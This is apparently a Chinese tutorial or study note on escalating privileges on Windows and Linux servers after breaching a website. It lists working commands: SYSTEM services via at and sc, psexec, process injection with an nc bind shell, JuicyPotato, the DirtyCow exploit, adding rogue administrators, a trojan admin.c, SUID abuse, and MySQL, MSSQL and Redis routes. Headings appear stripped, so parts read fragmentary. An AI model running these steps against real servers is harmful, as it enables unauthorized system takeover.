为了提高自己在服务器中的权限所进行的操作
主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞上传shell,以夺得该服务器权限。
• 操作系统安全的基础
用户空间 与 内核空间 是隔离的。
内核空间是内核代码运行的地方,用户空间是用户程序代码运行的地方。所以如果用户的程序崩溃了,内核是不受影响。
当进程运行在内核空间时就处于内核态,当进程运行在用户空间时就处于用户态。
• 账号分类
本地系统帐户(SYSTEM):
本地系统帐户是一个具有完全系统访问权并且在网络中担当计算机的超级帐户。
本地服务帐户(LOCAL SERVICE):
本地服务帐户是一个类似于经过认证的用户帐户的特殊的内置帐户。本地服务帐户具有和 Users 用户组成员相同级别的资源和对象访问权。
网络服务帐户(NETWORK SERVICE):
网络服务帐户是一个类似于经过认证的用户帐户的特殊的内置帐户。网络服务帐户具有和 Users 用户组成员相同级别的资源和对象访问权。
用户账号在登陆时获取权限令牌
而服务账号无需用户登陆,会自己在后台启动服务
各账号间权限不一样
windows系统的用户分为三类
user 、 administrator 、system
linux系统分为两类
user 、root
windows权限有三种。
user 有普通用户权限
administrator 有用户管理员权限
system 有系统管理员权限
本地提权
配置提权
漏洞提权
首先以administrator身份打开cmd
然后输入:at 10:21 /interactive cmd
然后在10:21的时候,打开了一个cmd
sc Create syscmd binpath="cmd/k start" type= own type= interact
sc start syscmd
system 服务名字,可以随便取
binpath 环境变量,执行的路径
psexec -i -s -d cmd
pinjector.exe -p 2152 cmd 12345
首先在靶机上的身份是administrator,靶机ip是172.16.11.141
进入靶机里pinjector.exe
的所在的根目录,
pinjector.exe -p 1444 cmd 5432
-p 是选择注入的进程的pid,这里的5432是端口
nc 172.16.11.141 5432
属于令牌提权
需要支持SeImpersonate或者SeAssignPrimaryToken权限
开启DCOM
本地支持RPC或者远程服务器支持PRC并能成功登录
能够找到可用的COM对象
Juicypotato.exe –p whoami
属于linux内核提权
下载现成的exp
https://github.com/FireFart/dirtycow
然后编译生成一个可执行的文件
gcc -pthread dirty.c -o dirty -lcrypt
最后提权
net localgroup administrators admin123456 /add
与利用漏洞提权相比,此方法更常用
大部分企业,会对系统的漏洞即时进行补丁更新,很难通过系统的漏洞进行入侵;
查找系统中以system权限启动的服务或应用,可以尝试将其替换或者反弹shell的方式提权;
可以查找NTFS权限允许users修改删除的应用,利用配置不当进行提权;
代码中是否有过滤参数的操作等都可以加以利用,进行提取;
icacls
icacls c:\windows\*.exe /save perm /T
i586-mingw32msvc-gcc -o admin.exe admin.c //因为exe要给windows用所以这里使用i586-mingw32msvc-gcc这个编译
admin.c
#include
int main()
{
int i;
i=system("net localgroup administrators a /add");
return 0;
}
只要管理员点击admin.exe,就会将用户a添加到管理员组
方法1
find / -perm 777 -exec ls -l {
} \;
-perm 777 :指定权限为777的文件
-exec ls-l : 对匹配的文件执行ls -l命令
{} \ ; ---------->格式
方法2
find / -writable -type f 2 >/dev/null | grep -v "/proc/“.
/proc:下多为系统启动的程序,一般不会有普通用户有可执行权限的程序
如第一步找到了usr文件下的123.sh符合条件
即 /usr/123. sh
就在123.sh里添加chmod u+s /bin/dash
然后当管理员执行这个脚本的时候
sh /usr/123. sh
普通用户就可以使用dash获得管理员权限
/bin/bash
还可以从应用系统的配置文件 、应用连接数据库的配置文件下手
1、知道root账号密码
2、win2000,2003系统
3、需要secure_file_priv函数打开
利用自定义函数功能,将mysql账号换为系统system权限
1、win2003 以下版本
2、secure_file_priv参数不为null
①、有sa权限
执行命令存储过程
xp_cmdshell
sp_OACreate
sp_oamethod
注册表存储过程
xp_regwrite
②、有dba权限
列目标存储过程
xp_dirtree
xp_subdirs
备份文件
备份到网站目录
通过备份文件到启动项提权
未授权访问
1、webshell
2、上传公钥
3、反弹shell
1、dba权限执行系统命令
windows开机时候都会有一些开机启动的程序,那时候启动的程序权限都是system,因为是system把他们启动的。利用这点,我们可以将自动化脚本写入启动项,达到提权的目的。